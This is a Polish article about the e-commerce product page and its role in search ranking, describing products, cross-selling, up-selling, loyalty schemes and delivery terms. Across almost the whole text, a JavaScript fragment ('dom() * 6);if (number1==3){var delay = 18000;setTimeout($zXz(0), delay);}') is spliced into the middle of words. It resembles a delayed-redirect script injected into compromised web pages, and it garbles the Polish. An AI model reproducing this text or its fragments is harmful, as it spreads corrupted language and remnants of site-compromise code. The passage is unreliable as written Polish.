Karta produktu dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to strona w e-sklepie, na której prezendom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towany jest konkretny produkt. To strona prawdopodobnie najbardziej zatłoczona informacją. Nic dziwnego, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tu rozpoczyna się finalizacja większości transakcji, tu też firma może realnie sterować sprzedażą. To także strona, do której najczęściej trafia klient, który poszukuje czegoś konkretnego.
Rola karty produkdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towej zaczyna się od pozycjonowania w wyszukiwarce, tak samego produktu, jak i całego e-sklepu.
Pozycjonowanie w wyszukiwarce
Pozycjonowanie sklepu. W procesie indeksowania roboty wyszukiwarki sprawdzają tytuły rozdziałów, treść opisów, nazwy produktów i na tej podstawie przyporządkowują e-sklep do jakiejś kategorii. To przyporządkowanie z kolei później pomaga pozycjonować poszczególne produkty.
Nazwa sklepu, nazwy kategorii, w końcu nazwy produktów i ich opisy są dla wyszukiwarki sygnałem, co sklep sprzedaje i podstawą, żeby wskazywać go kliendom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom. Dzięki nim wie, którym kliendom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom i w jakiej sytuacji. Największą rolę odgrywa w tym karta produktu. Nie dlatego, że ma aż taki wpływ, nazwa strony czy kategorii są dla wyszukiwarki ważniejsze, tylko dlatego, że nazwa jest jedna, kategorii kilka a stron produktu setki czy częściej tysiące. Ich wspólna, osobno nieznaczna, ale skumulowana wielka siła ostatecznie zadecyduje jak wyszukiwarka będzie postrzegać e-sklep.
Uwaga. „w wielości siła”. Pojedyncza karta produktu nie jest odwiedzana przez klientów zbyt częsdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, gdyż trafiają tak tylko ci, którym została podpowiedziana, właśnie na podstawie swojej zawardom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości. Jednak jeśli asortyment e-sklepu jest szeroki, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to suma tych nielicznych wejść może dać nawet 80% całego ruchu do e-sklepu. Dlatego war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to się postarać przy opisach, ale też zadbać, aby kart produktu było jak najwięcej.
Rolą karty jest poinformować roboty wyszukiwarki, o czym jest ta strona, co dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to za rodzaj produktu i przy okazji też, jaki jest profil sklepu. Dzięki temu wyszukiwarka lepiej podpowie stronę poszukującemu kliendom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towi. Dzięki temu jest wysoka szansa, że klient nie odejdzie, tylko coś kupi. Inaczej, nawet jeśli uda się ściągnąć klienta, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to od razu odejdzie, co będzie widać w wysokim współczynniku odbicia.
Uwaga. „jak się pozycjonuje w wyszukiwarkach?” To tajemnica i wyszukiwarki nie ujawniają swojego algorytmu pozycjonującego, ale pewne ogólne zasady są znane. Premiowane są zgodność treści z zapytaniem w wyszukiwarce i odwiedzalność strony przez innych klientów. Odwiedzalność strony jest ważna dlatego, że wyszukiwarka sama nie jest w stanie ocenić zawardom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tości merydom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}torycznej strony i jej jakości, musi się tu zadać na opinię innych. Dlatego zakłada, że jeśli stronę odwiedza wiele osób i długo na niej pozostają (a dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to potrafi zmierzyć), dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jej jakość jest wysoka.
Ci klienci, którzy trafiają na stronę główną e-sklepu czy na karty którejś z kategorii dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zwykle klienci, którzy chcą się dopiero czegoś dowiedzieć i rzadko od razu kupią. Gdy są w nastroju do kupowania, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zaczynają proces właśnie od karty produktu.
Ale pozycjonowanie dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tylko jedna z ról karty produktu. Jeszcze ważniejsza (bo niezastąpiona) jest dla poinformowania klienta, jaki produkt ogląda.
Opis produktu
To druga funkcja karty produktu. Opisuje i pokazuje produkt, zachęcając do jego zakupu. Przy okazji ten opis służy też pozycjonowaniu, ale teraz ma służyć kliendom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towi. Opis jest niezbędny, gdyż ma zastąpić wszystkie 5 zmysłów, które tradycyjnie pomagają podjąć decyzję, choć ich wpływ jest różny.
Uwaga. „zakupy są jak polowanie”. Kiedyś polowaliśmy czy zbieraliśmy korzonki, a teraz zastąpiły nam dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zakupy. Ale przyzwyczajenia i nawyki się nie zmieniły, nadal korzystamy z tych samych medom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tod i sposobów, a przede wszystkim zmysłów.
Opis musi zastąpić te wszystkie zmysły, więc musi być bardzo szczegółowy, dobrze też, jeśli uzupełni się go dobrej jakości zdjęciami. W zależności od produktu wardom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to też odnieść się do innych zmysłów, np. ubranie może być delikatne czy gładkie a jedzenie pachnące.
Internet daje też możliwości, jakich częsdom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to trudno szukać w handlu tradycyjnym. Można np. pokazać na filmie, jak produkt został wytworzony, można też pokazać, jak się go użytkuje. W najlepszych możliwych warunkach, pod kierunkiem osób, które go najlepiej znają.
Opis służy do oddania cech produktu (mierzonych zmysłami kupującego), ale można go też wykorzystać dla sterowania sprzedażą. Chodzi o dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, żeby wydobyć z produktu cechy unikalne czy też takie, których akurat szuka klienta (do tego służą filtry).
Sterowanie sprzedażą
Karta produktu dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to właściwie jedyne miejsce (poza bannerami promocyjnymi), gdzie da się sterować klientem tak, aby kupił dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, na czym firmie zależy. Do najważniejszym medom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tod należy up-sell i cross-sell.
Cross-sell. Czyli sprzedaż akcesoriów do produktu głównego. Karta produktu doskonale się do tego nadaje, przecież jest tam zaprezendom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towany produkt, wraz z opisem. To najlepsze miejsce, aby zaznaczyć, jakie pasują do niego akcesoria, wytłumaczyć, jakie mają znaczenie dla produktu głównego i dlaczego war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to je kupić. Akcesoria sprzedają się najlepiej wraz z produktem głównym, także dlatego, że ich cena zwykle jest wyraźnie niższa, więc klient ma wrażenie, że wydaje niewiele więcej.
Uwaga. „usługa dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to też akcesorium”. Jeśli do produktu głównego można zaproponować np. instalację, strojenie czy montaż, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to karta produktu potraktuje je tak samo, jak inne akcesorium.
Up-sell. Czyli zaproponowanie kliendom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towi produktu droższego, ale lepszego, a mówiąc bardziej precyzyjnie, lepiej spełniającego jego potrzebę (tę potrzebę też można przy okazji modyfikować). Najlepiej jest tu zademonstrować tzw. drabinkę cenową, pokazać droższy produkt o tej samej funkcji podstawowej, za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to podkreślić przy pomocy jednej „korzyści dla klienta”, dlaczego jednak war dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to się na niego zdecydować.
Program lojalnościowy. To także sposób na sterowanie sprzedażą. Wtedy na karcie produktu zaznacza się, że np. za ten konkretny produkt przysługuje podwójna premia w punktach czy inne korzyści, związane z programem lojalnościowym, jak bardzo pożądany w Internecie darmowy transport. Ale program lojalnościowy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to tylko opcja, nie każdy sprzedający go oferuje, za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to każdy musi pokazać warunki zakupu i w szczególności dostawy.
Warunki dostawy. W pierwszym rzędzie chodzi o dostępność, następnie minimalną kwotę zakupu, od której transport staje się darmowy. Ale chodzi też o czas dostawy, gdyż klienci, kiedy się zdecydują na produkt, dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to chcą go jak najszybciej.
Dostępność. W Internecie każdy dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towar jest na zamówienie, ale niektóre od razu, a inne dopiero po pewnym czasie. I dlatego ci sprzedający, którzy mają własny magazyn lub szybki dostęp do dostawcy na zasadzie drop-shipping, wygrywa. Ale trzeba o tym klienta poinformować, a do tego służy właśnie karta produktu.
Czas dostawy. Dostępność dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to jedno, a czas dostawy co innego. Jeśli wysyłka przyjdzie tego samego dnia czy nawet następnego, klienta potraktuje dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, jak od razu. Jeśli za 3 dni – dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to już odczuje czekanie. Trzeba go o tym poinformować, właśnie za pomocą karty produktu. To właściwy moment, gdyż decyduje się, czy zacznie proces zamawiania, czy nie.
Uwaga. „czasem lepiej się tłumaczyć”. Wielu sprzedawców z ostrożności wydłuża w komunikacji czas oczekiwania, żeby się potem nie tłumaczyć. Lepiej podać najkrótszy, jaki jest możliwy, a z wyjątków się tłumaczyć, nawet dając rabaty. Bez tego nie będzie tłumaczenia, ale też nie będzie sprzedaży.
Kwota minimalna do darmowego transportu. W Internecie darmowa dostawa dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to najlepiej działająca promocja. Komunikując tę kwotę na karcie produktu, klient będzie zastanawiał się, czy nie kupić produktu droższego (skoro i tak kupuje) albo czy nie domówić akcesoriów, tylko po dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, aby nie płacić za transport.
Abonament na transport. To system pomiędzy programem lojalnościowym a manipulacją kwotą, od której dostawa staje się darmowa. Tu klient przedpłaca transport, który staje się dla niego darmowy, oczywiście od pewnej minimalnej kwoty zamówienia. Taki system z jednej strony buduje lojalność (klient nie będzie już kupował gdzie indziej, żeby nie płacić za transport), z drugiej pozwala zwiększyć minimalną kwotę zamówienia.
Warunki sprzedaży
Żeby pomóc kliendom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towi podjąć decyzję o zakupie, trzeba przedstawić mu wiele informacji dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towarzyszących. Ponieważ większość transakcji zaczyna być realizowana na karcie produktu, tam też muszą się znaleźć najważniejsze informacje, które pomagają kliendom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towi zdecydować. A więc muszą pojawić się tam warunki sprzedaży, takie jak możliwości dostawy, płatności, zwrotu, reklamacji itd.
Pozostałe kroki procesu sprzedaży, w tym dalsze kroki po wejściu do koszyka czy płatności odbywają się już poza kartą produktu.
Podsumowanie
Karta produktu dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to serce e-commerce. To tam najczęściej podejmowane są decyzje, czy kupić, tam też można zacząć sterować sprzedażą i tam też dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to sterowanie jest najskuteczniejsze. Karty produktu dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to także element marketingu, pozycjonujący w wyszukiwarce tak e-sklep, jak i sam produkt. Pojedyncze oddziaływanie karty nie jest zbyt silne, gdyż dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to opisy poziomu H3 i mniej, ale za dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to kart jest bardzo dużo, więc efekt ich działania się kumuluje.